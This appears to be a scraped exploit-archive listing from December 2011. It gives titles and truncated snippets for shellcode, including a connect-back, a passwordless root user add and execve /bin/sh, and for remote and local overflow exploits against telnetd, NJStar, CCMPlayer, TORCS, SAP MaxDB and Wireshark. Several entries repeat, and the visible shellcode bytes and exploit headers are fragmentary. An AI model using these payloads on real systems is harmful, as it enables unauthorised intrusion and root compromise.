linux/x86 shellcode - setuid(0)+setgid(0)+add user iph without password - 124 bytes

/ Exploit Title: Linux/x86 Polymorphic ShellCode - setuid0+setgid0+add user 'iph' without password to /etc/passwd setuid - setgid - open - write - close - exit Date: 30/12/2011 Author: pentesters.ir Tested on: Linux x86 - CentOS 6.0 - 2.6.32-71 Website: http://pentesters.ir/ Contact:...

TelnetD encrypt_keyid - Function Pointer Overwrite

TelnetD encryptkeyid - Function Pointer Overwrite / telnetd-encryptkeyid.c Mon Dec 26 20:37:05 CET 2011 Copyright 2011 Jaime Penalba Estebanez NighterMan Copyright 2011 Gonzalo J. Carracedo BatchDrake [email protected] - [email protected] [email protected] - [email protected] / / /...

Telnetd encrypt_keyid: Remote Root function pointer overwrite

Exploit for linux platform in category remote exploits / telnetd-encryptkeyid.c Mon Dec 26 20:37:05 CET 2011 Copyright 2011 Jaime Penalba Estebanez NighterMan email protected - email protected Credits to batchdrake as always / / // / / / // /\ \ / / / / / \ / / / / / / // / / / / // / / / //,///...

TelnetD encrypt_keyid - Function Pointer Overwrite

/ telnetd-encryptkeyid.c Mon Dec 26 20:37:05 CET 2011 Copyright 2011 Jaime Penalba Estebanez NighterMan Copyright 2011 Gonzalo J. Carracedo BatchDrake [email protected] - [email protected] [email protected] - [email protected] / / // / / / // /\ \ / / / / / \ / / / / / / // / / / /...

TORCS 1.3.1 Buffer Overflow

/ Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories where TORCS loads its data, for...

TORCS 1.3.1 - acc Buffer Overflow

TORCS 1.3.1 - acc Buffer Overflow / Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories...

TORCS 1.3.1 acc Buffer Overflow

Exploit for windows platform in category local exploits / Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved...

TORCS 1.3.1 - acc Buffer Overflow

/ Exploit Title: TORCS acc Buffer Overflow Date: 20/12/2011 Author: Andres Gomez Software Link: http://torcs.sourceforge.net/ Version: torcs 1.3.1 Tested on: Windows CVE : / / This exploit generates a corrupted acc file which has to be saved in the directories where TORCS loads its data, for...

Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes

Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Shellcode exploit for linuxmips platform / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor...

linux/mips - connect back shellcode (port 0x7a69) - 168 bytes

/ Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor a0,t7,zero "\x01\xe0\x28\x27" // nor a1,t7,zero "\x28\x06\xff\xff" // slti a2,zero,-1 "\x24\x02\x10\x57" //...

YourPersonalWebServer

YOPS Your Own Personal WEB Server is a small SEDA-like HTTP ToDo: Add Reverse ToDo: Test Vulnerable Targets Exploit Pack - Hawk Eye Edition 3.3 Copyright 2014 Juan Sacco http://exploitpack.com This program is free software: you can redistribute it and/or modify it under the terms of the GNU Gener...

Web Servers UDP Flooding Denial of Service (CVE-2011-2013)

A denial of service vulnerability has been reported in all web servers. The vulnerability is due to the server's inability to handle multiple incoming UDP requests within a short period of time. Remote attackers may exploit this issue by rapidly sending a large number of UDP requests to the serve...

NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]

Exploit for windows platform in category dos / poc Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow ASLR Bypass Date: 02/12/11 Author: Zune - Julian Pulido Software Link: http://www.njstar.com/download/njcom.exe Version: 3.0 Build: 11818 and previous Tested on: Windows 7 Ultimate...

linux/x86-64 execve/bin/sh 52 bytes

linux/x86-64 execve/bin/sh 52 bytes. Shellcode exploit for linx86-64 platform / Exploit Title : linux/x86-64 execve/bin/sh 52 bytes Tested on : Linux iron 2.6.38-8-generic 42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x8664 x8664 x8664 GNU/Linux Date : 03/12/2011 Author : X-h4ck Email :...

NJStar Communicator 3.0 MiniSmtp Buffer Overflow

Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow ASLR Bypass Date: 02/12/11 Author: Zune - Julian Pulido Software Link: http://www.njstar.com/download/njcom.exe Version: 3.0 Build: 11818 and previous Tested on: Windows 7 Ultimate CVE:2011-4040 ! /usr/local/bin/python import socket...

SAP-Server-MaxDB

Sap Server 7.7.06.09 is vulnerable to a remote buffer overflow attack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP MaxDB. Authentication is not required to exploit this vulnerability. The specific flaw exists within the serv.exe process...

CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit (.m3u)

No description provided by source. Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 Tested on: Windows XP SP3 32-Bit EN VirtualBox require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = NormalRanking include...

CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)

Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 Tested on: Windows XP SP3 32-Bit EN VirtualBox require 'msf/core' class Metasploit3 'CCMPlayer 1.5 Stack based Buffer Overflow .m3u', 'Description' = %q This module exploits a...

linux/mips XOR Shellcode Encoder (60 Bytes)

include include include include include include include define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten with the byte its xored with 0. gcc encoder.c -o encoder 1. perl -e 'print "\xsh\xel\xlc\xod\xe0";'...

Wireshark 1.4.4 DECT Dissector Buffer Overflow

!/usr/bin/env python -- coding: iso-8859-15 -- a = """ \n\t-- CVE: 2011-1591 : Wireshark = 2.5 For any comments, remarks, news, please mail me : ipv at team . net \n""" import sys, struct if sys.versioninfo = 2, 5: from scapy.all import else: from scapy import align def xv: return struct.pack"I",...